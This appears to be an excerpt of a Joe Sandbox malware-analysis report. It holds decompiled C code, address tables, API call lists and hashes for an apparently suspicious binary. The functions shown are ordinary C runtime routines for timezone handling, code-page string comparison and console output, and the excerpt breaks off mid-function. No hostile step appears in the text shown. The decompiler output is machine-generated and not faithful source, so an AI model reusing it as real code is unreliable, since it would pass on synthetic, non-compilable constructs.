                                                                                                                                      0x013188c5
                                                                                                                                      0x013188ac
                                                                                                                                      0x013188cb
                                                                                                                                      0x013188cb
                                                                                                                                      0x013188cd
                                                                                                                                      0x013188d1
                                                                                                                                      0x013188d1
                                                                                                                                      0x013188d6
                                                                                                                                      0x013188d8
                                                                                                                                      0x013188db
                                                                                                                                      0x013188de
                                                                                                                                      0x013188e0
                                                                                                                                      0x013188e3
                                                                                                                                      0x013188fb
                                                                                                                                      0x013188fe
                                                                                                                                      0x01318901
                                                                                                                                      0x01318909
                                                                                                                                      0x0131890e
                                                                                                                                      0x01318913
                                                                                                                                      0x00000000
                                                                                                                                      0x01318913
                                                                                                                                      0x013188e5
                                                                                                                                      0x013188ea
                                                                                                                                      0x013188ed
                                                                                                                                      0x013188f2
                                                                                                                                      0x013188f5
                                                                                                                                      0x013188f7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013188f9
                                                                                                                                      0x01318846
                                                                                                                                      0x00000000
                                                                                                                                      0x0131882d
                                                                                                                                      0x013187a0
                                                                                                                                      0x013187a0
                                                                                                                                      0x013187a2
                                                                                                                                      0x013187a4
                                                                                                                                      0x013187a4
                                                                                                                                      0x013187a8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013187ac
                                                                                                                                      0x013187c0
                                                                                                                                      0x013187c0
                                                                                                                                      0x013187ae
                                                                                                                                      0x013187ae
                                                                                                                                      0x013187ae
                                                                                                                                      0x013187b4
                                                                                                                                      0x00000000
                                                                                                                                      0x013187b6
                                                                                                                                      0x013187b6
                                                                                                                                      0x013187b9
                                                                                                                                      0x013187be
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013187be
                                                                                                                                      0x013187b4
                                                                                                                                      0x013187c9
                                                                                                                                      0x013187cb
                                                                                                                                      0x0131891a
                                                                                                                                      0x0131891a
                                                                                                                                      0x013187d1
                                                                                                                                      0x013187d1
                                                                                                                                      0x00000000
                                                                                                                                      0x013187d1
                                                                                                                                      0x00000000
                                                                                                                                      0x013187cb
                                                                                                                                      0x013187c4
                                                                                                                                      0x013187c6
                                                                                                                                      0x013187c6
                                                                                                                                      0x00000000
                                                                                                                                      0x013187c6
                                                                                                                                      0x0131879e
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 013187D5
                                                                                                                                      • _free.LIBCMT ref: 013187F9
                                                                                                                                      • _free.LIBCMT ref: 01318980
                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01326484), ref: 01318992
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0132F494,000000FF,00000000,0000003F,00000000,?,?), ref: 01318A0A
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0132F4E8,000000FF,?,0000003F,00000000,?), ref: 01318A37
                                                                                                                                      • _free.LIBCMT ref: 01318B4C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 314583886-0
                                                                                                                                      • Opcode ID: cbe7a813660240396c6310d1e98a6b2e54e8e39e0ff7e6d51fe798dd73a8cd75
                                                                                                                                      • Instruction ID: e6058cfc39e7a32212b6b9a9a92608f64dd491f61df462e23cb27360499d8d7e
                                                                                                                                      • Opcode Fuzzy Hash: cbe7a813660240396c6310d1e98a6b2e54e8e39e0ff7e6d51fe798dd73a8cd75
                                                                                                                                      • Instruction Fuzzy Hash: 7DC1177290420AAFDB39AF7D9C40AAA7FBDEF46318F1441EDD98597249D7308A01C758
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                      			E0131E007(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				char _v22;
                                                                                                                                      				struct _cpinfo _v28;
                                                                                                                                      				short* _v32;
                                                                                                                                      				int _v36;
                                                                                                                                      				char* _v40;
                                                                                                                                      				int _v44;
                                                                                                                                      				intOrPtr _v48;
                                                                                                                                      				void* _v60;
                                                                                                                                      				signed int _t63;
                                                                                                                                      				int _t70;
                                                                                                                                      				signed int _t72;
                                                                                                                                      				short* _t73;
                                                                                                                                      				signed int _t77;
                                                                                                                                      				short* _t87;
                                                                                                                                      				void* _t89;
                                                                                                                                      				void* _t92;
                                                                                                                                      				int _t99;
                                                                                                                                      				intOrPtr _t101;
                                                                                                                                      				intOrPtr _t102;
                                                                                                                                      				signed int _t112;
                                                                                                                                      				char* _t114;
                                                                                                                                      				char* _t115;
                                                                                                                                      				void* _t120;
                                                                                                                                      				void* _t121;
                                                                                                                                      				intOrPtr _t122;
                                                                                                                                      				intOrPtr _t123;
                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                      				short* _t126;
                                                                                                                                      				int _t128;
                                                                                                                                      				int _t129;
                                                                                                                                      				short* _t130;
                                                                                                                                      				intOrPtr* _t131;
                                                                                                                                      				signed int _t132;
                                                                                                                                      				short* _t133;
                                                                                                                                      
                                                                                                                                      				_t63 =  *0x132e00c; // 0x17120af4
                                                                                                                                      				_v8 = _t63 ^ _t132;
                                                                                                                                      				_t128 = _a20;
                                                                                                                                      				_v44 = _a4;
                                                                                                                                      				_v48 = _a8;
                                                                                                                                      				_t67 = _a24;
                                                                                                                                      				_v40 = _a24;
                                                                                                                                      				_t125 = _a16;
                                                                                                                                      				_v36 = _t125;
                                                                                                                                      				if(_t128 <= 0) {
                                                                                                                                      					if(_t128 >= 0xffffffff) {
                                                                                                                                      						goto L2;
                                                                                                                                      					} else {
                                                                                                                                      						goto L5;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t128 = E0131B654(_t125, _t128);
                                                                                                                                      					_t67 = _v40;
                                                                                                                                      					L2:
                                                                                                                                      					_t99 = _a28;
                                                                                                                                      					if(_t99 <= 0) {
                                                                                                                                      						if(_t99 < 0xffffffff) {
                                                                                                                                      							goto L5;
                                                                                                                                      						} else {
                                                                                                                                      							goto L7;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t99 = E0131B654(_t67, _t99);
                                                                                                                                      						L7:
                                                                                                                                      						_t70 = _a32;
                                                                                                                                      						if(_t70 == 0) {
                                                                                                                                      							_t70 =  *( *_v44 + 8);
                                                                                                                                      							_a32 = _t70;
                                                                                                                                      						}
                                                                                                                                      						if(_t128 == 0 || _t99 == 0) {
                                                                                                                                      							if(_t128 != _t99) {
                                                                                                                                      								if(_t99 <= 1) {
                                                                                                                                      									if(_t128 <= 1) {
                                                                                                                                      										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                                                                                                      											goto L5;
                                                                                                                                      										} else {
                                                                                                                                      											if(_t128 <= 0) {
                                                                                                                                      												if(_t99 <= 0) {
                                                                                                                                      													goto L36;
                                                                                                                                      												} else {
                                                                                                                                      													_t89 = 2;
                                                                                                                                      													if(_v28 >= _t89) {
                                                                                                                                      														_t114 =  &_v22;
                                                                                                                                      														if(_v22 != 0) {
                                                                                                                                      															_t131 = _v40;
                                                                                                                                      															while(1) {
                                                                                                                                      																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                                                                                                      																if(_t122 == 0) {
                                                                                                                                      																	goto L15;
                                                                                                                                      																}
                                                                                                                                      																_t101 =  *_t131;
                                                                                                                                      																if(_t101 <  *_t114 || _t101 > _t122) {
                                                                                                                                      																	_t114 = _t114 + _t89;
                                                                                                                                      																	if( *_t114 != 0) {
                                                                                                                                      																		continue;
                                                                                                                                      																	} else {
                                                                                                                                      																		goto L15;
                                                                                                                                      																	}
                                                                                                                                      																}
                                                                                                                                      																goto L63;
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													goto L15;
                                                                                                                                      												}
                                                                                                                                      											} else {
                                                                                                                                      												_t92 = 2;
                                                                                                                                      												if(_v28 >= _t92) {
                                                                                                                                      													_t115 =  &_v22;
                                                                                                                                      													if(_v22 != 0) {
                                                                                                                                      														while(1) {
                                                                                                                                      															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                                                                                                      															if(_t123 == 0) {
                                                                                                                                      																goto L17;
                                                                                                                                      															}
                                                                                                                                      															_t102 =  *_t125;
                                                                                                                                      															if(_t102 <  *_t115 || _t102 > _t123) {
                                                                                                                                      																_t115 = _t115 + _t92;
                                                                                                                                      																if( *_t115 != 0) {
                                                                                                                                      																	continue;
                                                                                                                                      																} else {
                                                                                                                                      																	goto L17;
                                                                                                                                      																}
                                                                                                                                      															}
                                                                                                                                      															goto L63;
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      												goto L17;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										L17:
                                                                                                                                      										_push(3);
                                                                                                                                      										goto L13;
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									L15:
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								_push(2);
                                                                                                                                      								L13:
                                                                                                                                      							}
                                                                                                                                      						} else {
                                                                                                                                      							L36:
                                                                                                                                      							_t126 = 0;
                                                                                                                                      							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                                                                                                                                      							_v44 = _t72;
                                                                                                                                      							if(_t72 == 0) {
                                                                                                                                      								L5:
                                                                                                                                      							} else {
                                                                                                                                      								_t120 = _t72 + _t72;
                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                      								if((_t120 + 0x00000008 & _t72) == 0) {
                                                                                                                                      									_t73 = 0;
                                                                                                                                      									_v32 = 0;
                                                                                                                                      									goto L45;
                                                                                                                                      								} else {
                                                                                                                                      									asm("sbb eax, eax");
                                                                                                                                      									_t85 = _t72 & _t120 + 0x00000008;
                                                                                                                                      									_t112 = _t120 + 8;
                                                                                                                                      									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                      										_t87 = E013151CD(_t112, _t85 & _t112);
                                                                                                                                      										_v32 = _t87;
                                                                                                                                      										if(_t87 == 0) {
                                                                                                                                      											goto L61;
                                                                                                                                      										} else {
                                                                                                                                      											 *_t87 = 0xdddd;
                                                                                                                                      											goto L43;
                                                                                                                                      										}
                                                                                                                                      									} else {
                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                      										E01322CE0();
                                                                                                                                      										_t87 = _t133;
                                                                                                                                      										_v32 = _t87;
                                                                                                                                      										if(_t87 == 0) {
                                                                                                                                      											L61:
                                                                                                                                      											_t100 = _v32;
                                                                                                                                      										} else {
                                                                                                                                      											 *_t87 = 0xcccc;
                                                                                                                                      											L43:
                                                                                                                                      											_t73 =  &(_t87[4]);
                                                                                                                                      											_v32 = _t73;
                                                                                                                                      											L45:
                                                                                                                                      											if(_t73 == 0) {
                                                                                                                                      												goto L61;
                                                                                                                                      											} else {
                                                                                                                                      												_t129 = _a32;
                                                                                                                                      												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
                                                                                                                                      													goto L61;
                                                                                                                                      												} else {
                                                                                                                                      													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                                                                                                                                      													_v36 = _t77;
                                                                                                                                      													if(_t77 == 0) {
                                                                                                                                      														goto L61;
                                                                                                                                      													} else {
                                                                                                                                      														_t121 = _t77 + _t77;
                                                                                                                                      														_t108 = _t121 + 8;
                                                                                                                                      														asm("sbb eax, eax");
                                                                                                                                      														if((_t121 + 0x00000008 & _t77) == 0) {
                                                                                                                                      															_t130 = _t126;
                                                                                                                                      															goto L56;
                                                                                                                                      														} else {
                                                                                                                                      															asm("sbb eax, eax");
                                                                                                                                      															_t81 = _t77 & _t121 + 0x00000008;
                                                                                                                                      															_t108 = _t121 + 8;
                                                                                                                                      															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                                                                                                      																asm("sbb eax, eax");
                                                                                                                                      																_t130 = E013151CD(_t108, _t81 & _t108);
                                                                                                                                      																_pop(_t108);
                                                                                                                                      																if(_t130 == 0) {
                                                                                                                                      																	goto L59;
                                                                                                                                      																} else {
                                                                                                                                      																	 *_t130 = 0xdddd;
                                                                                                                                      																	goto L54;
                                                                                                                                      																}
                                                                                                                                      															} else {
                                                                                                                                      																asm("sbb eax, eax");
                                                                                                                                      																E01322CE0();
                                                                                                                                      																_t130 = _t133;
                                                                                                                                      																if(_t130 == 0) {
                                                                                                                                      																	L59:
                                                                                                                                      																	_t100 = _v32;
                                                                                                                                      																} else {
                                                                                                                                      																	 *_t130 = 0xcccc;
                                                                                                                                      																	L54:
                                                                                                                                      																	_t130 =  &(_t130[4]);
                                                                                                                                      																	L56:
                                                                                                                                      																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                                                                                                                                      																		goto L59;
                                                                                                                                      																	} else {
                                                                                                                                      																		_t100 = _v32;
                                                                                                                                      																		_t126 = E013147CE(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                                                                                                                                      																	}
                                                                                                                                      																}
                                                                                                                                      															}
                                                                                                                                      														}
                                                                                                                                      														E0131407D(_t130);
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								E0131407D(_t100);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				L63:
                                                                                                                                      				return E0130A07B(_v8 ^ _t132);
                                                                                                                                      			}






































                                                                                                                                      0x0131e00f
                                                                                                                                      0x0131e016
                                                                                                                                      0x0131e01e
                                                                                                                                      0x0131e021
                                                                                                                                      0x0131e027
                                                                                                                                      0x0131e02a
                                                                                                                                      0x0131e02d
                                                                                                                                      0x0131e031
                                                                                                                                      0x0131e034
                                                                                                                                      0x0131e039
                                                                                                                                      0x0131e060
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e03b
                                                                                                                                      0x0131e043
                                                                                                                                      0x0131e045
                                                                                                                                      0x0131e049
                                                                                                                                      0x0131e049
                                                                                                                                      0x0131e04e
                                                                                                                                      0x0131e06c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e050
                                                                                                                                      0x0131e059
                                                                                                                                      0x0131e06e
                                                                                                                                      0x0131e06e
                                                                                                                                      0x0131e073
                                                                                                                                      0x0131e07a
                                                                                                                                      0x0131e07d
                                                                                                                                      0x0131e07d
                                                                                                                                      0x0131e082
                                                                                                                                      0x0131e08e
                                                                                                                                      0x0131e09b
                                                                                                                                      0x0131e0a8
                                                                                                                                      0x0131e0bb
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0bd
                                                                                                                                      0x0131e0bf
                                                                                                                                      0x0131e0f2
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0f4
                                                                                                                                      0x0131e0f6
                                                                                                                                      0x0131e0fa
                                                                                                                                      0x0131e100
                                                                                                                                      0x0131e103
                                                                                                                                      0x0131e105
                                                                                                                                      0x0131e108
                                                                                                                                      0x0131e108
                                                                                                                                      0x0131e10d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e10f
                                                                                                                                      0x0131e113
                                                                                                                                      0x0131e11d
                                                                                                                                      0x0131e122
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e124
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e124
                                                                                                                                      0x0131e122
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e113
                                                                                                                                      0x0131e108
                                                                                                                                      0x0131e103
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0fa
                                                                                                                                      0x0131e0c1
                                                                                                                                      0x0131e0c3
                                                                                                                                      0x0131e0c7
                                                                                                                                      0x0131e0cd
                                                                                                                                      0x0131e0d0
                                                                                                                                      0x0131e0d2
                                                                                                                                      0x0131e0d2
                                                                                                                                      0x0131e0d7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0d9
                                                                                                                                      0x0131e0dd
                                                                                                                                      0x0131e0e7
                                                                                                                                      0x0131e0ec
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0ee
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0ee
                                                                                                                                      0x0131e0ec
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0dd
                                                                                                                                      0x0131e0d2
                                                                                                                                      0x0131e0d0
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0c7
                                                                                                                                      0x0131e0bf
                                                                                                                                      0x0131e0aa
                                                                                                                                      0x0131e0aa
                                                                                                                                      0x0131e0aa
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e0aa
                                                                                                                                      0x0131e09d
                                                                                                                                      0x0131e09d
                                                                                                                                      0x0131e09f
                                                                                                                                      0x0131e090
                                                                                                                                      0x0131e090
                                                                                                                                      0x0131e092
                                                                                                                                      0x0131e092
                                                                                                                                      0x0131e129
                                                                                                                                      0x0131e129
                                                                                                                                      0x0131e129
                                                                                                                                      0x0131e136
                                                                                                                                      0x0131e13c
                                                                                                                                      0x0131e141
                                                                                                                                      0x0131e062
                                                                                                                                      0x0131e147
                                                                                                                                      0x0131e147
                                                                                                                                      0x0131e14f
                                                                                                                                      0x0131e153
                                                                                                                                      0x0131e1ae
                                                                                                                                      0x0131e1b0
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e155
                                                                                                                                      0x0131e15a
                                                                                                                                      0x0131e15c
                                                                                                                                      0x0131e15e
                                                                                                                                      0x0131e166
                                                                                                                                      0x0131e18a
                                                                                                                                      0x0131e18f
                                                                                                                                      0x0131e194
                                                                                                                                      0x0131e19a
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e1a0
                                                                                                                                      0x0131e1a0
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e1a0
                                                                                                                                      0x0131e168
                                                                                                                                      0x0131e16a
                                                                                                                                      0x0131e16e
                                                                                                                                      0x0131e173
                                                                                                                                      0x0131e175
                                                                                                                                      0x0131e17a
                                                                                                                                      0x0131e28f
                                                                                                                                      0x0131e28f
                                                                                                                                      0x0131e180
                                                                                                                                      0x0131e180
                                                                                                                                      0x0131e1a6
                                                                                                                                      0x0131e1a6
                                                                                                                                      0x0131e1a9
                                                                                                                                      0x0131e1b3
                                                                                                                                      0x0131e1b5
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e1bb
                                                                                                                                      0x0131e1c3
                                                                                                                                      0x0131e1d1
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e1d7
                                                                                                                                      0x0131e1e0
                                                                                                                                      0x0131e1e6
                                                                                                                                      0x0131e1eb
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e1f1
                                                                                                                                      0x0131e1f1
                                                                                                                                      0x0131e1f4
                                                                                                                                      0x0131e1f9
                                                                                                                                      0x0131e1fd
                                                                                                                                      0x0131e249
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e1ff
                                                                                                                                      0x0131e204
                                                                                                                                      0x0131e206
                                                                                                                                      0x0131e208
                                                                                                                                      0x0131e210
                                                                                                                                      0x0131e22d
                                                                                                                                      0x0131e237
                                                                                                                                      0x0131e239
                                                                                                                                      0x0131e23c
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e23e
                                                                                                                                      0x0131e23e
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e23e
                                                                                                                                      0x0131e212
                                                                                                                                      0x0131e214
                                                                                                                                      0x0131e218
                                                                                                                                      0x0131e21d
                                                                                                                                      0x0131e221
                                                                                                                                      0x0131e283
                                                                                                                                      0x0131e283
                                                                                                                                      0x0131e223
                                                                                                                                      0x0131e223
                                                                                                                                      0x0131e244
                                                                                                                                      0x0131e244
                                                                                                                                      0x0131e24b
                                                                                                                                      0x0131e24d
                                                                                                                                      0x00000000
                                                                                                                                      0x0131e266
                                                                                                                                      0x0131e266
                                                                                                                                      0x0131e27f
                                                                                                                                      0x0131e27f
                                                                                                                                      0x0131e24d
                                                                                                                                      0x0131e221
                                                                                                                                      0x0131e210
                                                                                                                                      0x0131e287
                                                                                                                                      0x0131e28c
                                                                                                                                      0x0131e1eb
                                                                                                                                      0x0131e1d1
                                                                                                                                      0x0131e1b5
                                                                                                                                      0x0131e17a
                                                                                                                                      0x0131e166
                                                                                                                                      0x0131e293
                                                                                                                                      0x0131e299
                                                                                                                                      0x0131e141
                                                                                                                                      0x0131e082
                                                                                                                                      0x0131e04e
                                                                                                                                      0x0131e29b
                                                                                                                                      0x0131e2ae

                                                                                                                                      APIs
                                                                                                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0131E2E0,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0131E0B3
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0131E2E0,00000000,00000000,?,00000001,?,?,?,?), ref: 0131E136
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0131E2E0,?,0131E2E0,00000000,00000000,?,00000001,?,?,?,?), ref: 0131E1C9
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0131E2E0,00000000,00000000,?,00000001,?,?,?,?), ref: 0131E1E0
                                                                                                                                        • Part of subcall function 013151CD: RtlAllocateHeap.NTDLL(00000000,0130969E,00000000,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E,00000004,00000000,00000000,00000000), ref: 013151FF
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0131E2E0,00000000,00000000,?,00000001,?,?,?,?), ref: 0131E25C
                                                                                                                                      • __freea.LIBCMT ref: 0131E287
                                                                                                                                      • __freea.LIBCMT ref: 0131E293
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2829977744-0
                                                                                                                                      • Opcode ID: 579f447e90fd1259aecae3781ce75e866f29279246cf040a6290f69183fe1898
                                                                                                                                      • Instruction ID: a511bc49c3be24c9af69db0f17bdf97c7375ae01b1b0a3a302bfe0256d0b653a
                                                                                                                                      • Opcode Fuzzy Hash: 579f447e90fd1259aecae3781ce75e866f29279246cf040a6290f69183fe1898
                                                                                                                                      • Instruction Fuzzy Hash: 3E911971E0021A9EEF2A9E69CC40EEEBFB5AF19758F084539ED01E7148D736D841C7A0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 73%
                                                                                                                                      			E0131B887(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				signed char _v15;
                                                                                                                                      				char _v16;
                                                                                                                                      				void _v24;
                                                                                                                                      				short _v28;
                                                                                                                                      				char _v31;
                                                                                                                                      				void _v32;
                                                                                                                                      				long _v36;
                                                                                                                                      				intOrPtr _v40;
                                                                                                                                      				void* _v44;
                                                                                                                                      				signed int _v48;
                                                                                                                                      				signed char* _v52;
                                                                                                                                      				long _v56;
                                                                                                                                      				int _v60;
                                                                                                                                      				signed int _t78;
                                                                                                                                      				signed int _t80;
                                                                                                                                      				int _t86;
                                                                                                                                      				void* _t94;
                                                                                                                                      				long _t97;
                                                                                                                                      				void _t105;
                                                                                                                                      				void* _t112;
                                                                                                                                      				signed int _t116;
                                                                                                                                      				signed int _t118;
                                                                                                                                      				signed char _t123;
                                                                                                                                      				signed char _t128;
                                                                                                                                      				intOrPtr _t129;
                                                                                                                                      				signed int _t131;
                                                                                                                                      				signed char* _t133;
                                                                                                                                      				intOrPtr* _t135;
                                                                                                                                      				signed int _t136;
                                                                                                                                      				void* _t137;
                                                                                                                                      
                                                                                                                                      				_t78 =  *0x132e00c; // 0x17120af4
                                                                                                                                      				_v8 = _t78 ^ _t136;
                                                                                                                                      				_t80 = _a8;
                                                                                                                                      				_t118 = _t80 >> 6;
                                                                                                                                      				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                      				_t133 = _a12;
                                                                                                                                      				_v52 = _t133;
                                                                                                                                      				_v48 = _t118;
                                                                                                                                      				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x132f128 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                      				_v40 = _a16 + _t133;
                                                                                                                                      				_t86 = GetConsoleCP();
                                                                                                                                      				_t135 = _a4;
                                                                                                                                      				_v60 = _t86;
                                                                                                                                      				 *_t135 = 0;
                                                                                                                                      				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                      				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                      				while(_t133 < _v40) {
                                                                                                                                      					_v28 = 0;
                                                                                                                                      					_v31 =  *_t133;
                                                                                                                                      					_t129 =  *((intOrPtr*)(0x132f128 + _v48 * 4));
                                                                                                                                      					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                      					if((_t123 & 0x00000004) == 0) {
                                                                                                                                      						if(( *(E01313CE4(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                      							_push(1);
                                                                                                                                      							_push(_t133);
                                                                                                                                      							goto L8;
                                                                                                                                      						} else {
                                                                                                                                      							if(_t133 >= _v40) {
                                                                                                                                      								_t131 = _v48;
                                                                                                                                      								 *((char*)( *((intOrPtr*)(0x132f128 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                      								 *( *((intOrPtr*)(0x132f128 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x132f128 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                      								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                      							} else {
                                                                                                                                      								_t112 = E0131536D( &_v28, _t133, 2);
                                                                                                                                      								_t137 = _t137 + 0xc;
                                                                                                                                      								if(_t112 != 0xffffffff) {
                                                                                                                                      									_t133 =  &(_t133[1]);
                                                                                                                                      									goto L9;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t128 = _t123 & 0x000000fb;
                                                                                                                                      						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                      						_push(2);
                                                                                                                                      						_v15 = _t128;
                                                                                                                                      						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                      						_push( &_v16);
                                                                                                                                      						L8:
                                                                                                                                      						_push( &_v28);
                                                                                                                                      						_t94 = E0131536D();
                                                                                                                                      						_t137 = _t137 + 0xc;
                                                                                                                                      						if(_t94 != 0xffffffff) {
                                                                                                                                      							L9:
                                                                                                                                      							_t133 =  &(_t133[1]);
                                                                                                                                      							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                      							_v56 = _t97;
                                                                                                                                      							if(_t97 != 0) {
                                                                                                                                      								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                      									L19:
                                                                                                                                      									 *_t135 = GetLastError();
                                                                                                                                      								} else {
                                                                                                                                      									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                      									if(_v36 >= _v56) {
                                                                                                                                      										if(_v31 != 0xa) {
                                                                                                                                      											goto L16;
                                                                                                                                      										} else {
                                                                                                                                      											_t105 = 0xd;
                                                                                                                                      											_v32 = _t105;
